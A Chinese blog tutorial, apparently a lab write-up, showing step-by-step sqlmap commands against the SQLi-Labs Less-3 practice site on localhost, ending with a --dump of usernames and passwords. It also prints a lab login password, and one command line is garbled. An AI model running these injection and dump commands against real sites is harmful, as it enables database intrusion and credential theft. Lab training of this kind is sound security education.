SQL注入-SQLMAP基础使用(十二)

已于 2022-03-03 15:18:06 修改
阅读量852 收藏
点赞数 1
分类专栏: SQL注入 文章标签: 安全 数据库 web安全 经验分享 sql
于 2022-02-21 00:42:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gjqhs/article/details/123038239
版权

实验目的
了解SQLMAP的工作原理,熟悉SQLMAP的常用命令,掌握SQLMAP的-u参数的基本使用方法。
实验环境
攻击机:吹毁目标

(2)安装的应用软件:sqlmapBurpsuiteFireFox浏览器及其插件Hackbar、 等

(3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890
靶机:司马华腾
(1)操作系统:本机(建议用虚拟机)不过我太懒了[]~( ̄▽ ̄)~*
(2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DVWA、SQLi-Labs、

webug3.0环境搭建

SQLMAP是一个开源的自动化SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。
SQLMAP的基本功能包括:判断可注入的参数、判断可以使用哪一种SQL注入技术进行注入、判断识别数据库的类型以及根据用户的选择从数据库中读取数据。
SQLMAP支持的注入技术包括以下五种:
(1)基于布尔的盲注:根据返回页面判断条件真假的注入。
(2)基于时间的盲注:不能根据页面返回内容判断任何信息,用条件语句查看
时间延迟语句是否执行(即页面返回时间是否增加)来判断。
(3)基于报错的注入:页面会返回错误信息,或者把注入的语句的结果直接返
回在页面中。
(4)基于联合查询的注入:可以使用UNION的情况下的注入。
(5)堆查询注入:同时执行多条语句的注入。
SOLMAP支持的数据库类型主要包括一些关系型数据库(RMDBS),如
MySQL、Oracle、 PostgresQL、Microsoft SQL Server、 Microsoft Access、IBM
DB2、SQLite、Firebird、Sybase、SAPMaxDB、Informix、HSQLDB等。
实验步骤

本实验的目标是:以SQLi-Labs网站的Less-3为入口,利用SQLMAP实施自
动化SQL注入,获取SQLi-Labs网站的登录用户名和密码。
1.访间SQLi-Labs网站
在攻击机Pentest-Atk打开FireFox浏览器,并访问粑机A-SQLi-Labs上的
SQLi-Labs网站Less-3。访间的URL为:

http://[机IP]/sqli-1abs/less-3/

登录后,根据网页提示,先给定一个GET参数,即;

http://127.0.0.1/sqli-labs-master/Less-3/?id=1

此时页面显示id=1的用户名Dump、密码Dump。

2.启动SQLMAP
启动Windows操作系统的命令行工具cmd:键入SQLmap路径

反之于目录直接cmd亦可

SQLmap的下载和安装使用教程_Gjqhs的博客-CSDN博客

 使用以下命令启动SQLMAP帮助:

python sqlmap.py -h

3.寻找注入点
使用以下命令自动寻找网站的注入点,并获取网站及后台数据库的基本信息:
pythonsqimappyu“http://靶机IP]/sqli-1abs/less-3/id=1”

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1

(可根据实际需要)               选择y                       /n

检测结果

 4.获取所有数据库的库名
(1)使用以下命令获取所有数据库的库名:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' --dbs

所有库名

(2)使用以下命令获取网站当前所在数据库的库名:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' --current-db

 获取成功

 检测结果:网站当前所在数据库的库名为security。

5.获取security数据库中所有的表名
使用以下命令获取security数据库中所有的表名:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security --tables

检测结果:security数据库中含有emails、referers、uagents、users四张表。

其中,有一个名为users的表,这当中往往存放着网站用户的基本信息。

6.获取users表的全部字段名
使用以下命令获取users表的全部字段名

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security -T users --columns

 检测结果:users表中有三个字段id、username和password。

7.获取users表id、username和password字段的全部值
使用以下命令获取users表id、username和password字段的全部值

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security -T users -C id,username,password --dump

 检测结果如下图所示:

 实验结束,你学废了吗

这不趁热再来几个

SQL注入 ——sql数据库操作基础(一)_Gjqhs的博客-CSDN博客

SQL注入-二阶注入(十)_Gjqhs的博客-CSDN博客

SQL注入-宽字节注入(十一)(面试热点)_Gjqhs的博客-CSDN博客

...

更多包括而不限于SQL注入的文章,关注我全部带走吧( •̀ ω •́ )✧

告诉桃花不用开了
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap启动视频教程
02-25
具体看视频! 今天给你们出一个SQLMAP启动的教程 不懂的联系我 工具:Python 2.7 启动语句:sqlmap.py –h 首先需要把Python2.7安装到C盘 我这里已经安装了 然后需要把sqlmap解压到python的文件夹里边 放进去以后我们创建一个快捷方式 像这样创建一个cmd的这样的快捷方式 然后点击属性 看我操作 像这样就可以了 我们打开 输入启动语句 出现这样的提示 我们就成功启动了 工具会打包给你们 不懂得怜惜我qq在线给你解答。
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMap:SQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
网络安全——SQLMAP基础
weixin_54055099的博客
09-16 1834
SQLMAP的基础使用
SQLMap的详细使用教程
瓦罗兰特顶级C位的博客
01-02 673
SQL注入是一种广泛存在于Web应用程序的漏洞,可以导致敏感数据泄露、系统破坏等严重后果。
使用sqlmap对sqli-less-12 的题解
weixin_44352058的博客
05-03 704
1.由于该题是post注入,所以我们在用户名密码处随意输入并使用bp进行抓包存储文件。 2.查询注入sqlmap.py -r 1.txt 3.查询数据库 sqlmap.py -r 1.txt –dbs 4.查询表 sqlmap.py -r 1.txt -D security –tables 5.查询列 sqlmap.py -r 1.txt -D security -T u...
sqli-labs靶场1-12关通关记录
SEV__en的博客
07-25 1647
攻击者通过注入SQL语句片段导致后端执行预期外的SQL查询。
bwapp---sql注入第十二关过关过程及分析
weixin_45821250的博客
12-07 2524
SQL Injection - Stored (User-Agent) Your IP address and User-Agent string have been logged into the database! (download log file)
sqlmap的使用
qq_44418229的博客
06-03 239
关于sqlmap的下载,启动,常用语句
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入的盲注类型,并...
sql注入扫描_sqlmap-1.1.3.zip
02-13
在版本sqlmap-1.1.3中,该工具已经兼容Python3,这扩大了它的使用范围,因为Python3逐渐成为主流的编程语言。 SQLMap的工作原理主要包括以下几个步骤: 1. **探测阶段**:SQLMap首先会尝试各种可能的注入点,通过...
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
SQLMap使用|命令大全(干货)
热门推荐
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 9141
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQLSQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
sqlmap搭建(非常详细)!
Cobra的博客
12-15 1148
一、准备的软件 1、SQLmap 2、Python2(Python3不支持SQLmap) 下载地址: SQLmap:https://github.com/sqlmapproject/sqlmap/zipball/master Python2:https://www.python.org/downloads/release/python-2715/ 3、 首先安装Python2,第一步直接Next下一步 4、 第二步选择安装路径,我这里直接默认安装,如果你需要安装到其他目录可以自行修改,设置
【简单工具】SQLMap简介及初步使用
Fighting_hawk的博客
01-27 4157
1. 了解进行SQLMap测试实验需要的准备工作; 2. 了解SQLMap工具的使用方式。
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4037
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
Conmi的正确答案——ESP32-C3开启安全下载模式
最新发布
Conmi的博客
07-03 322
IDF版本:4.4.7。
什么是SQL注入漏洞-SQLmap注入
05-21
SQL注入漏洞是一种常见的Web应用程序安全...SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序中的SQL注入漏洞。它通过发送各种恶意有效载荷来测试目标网站是否存在SQL注入漏洞,并自动获取目标数据库的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值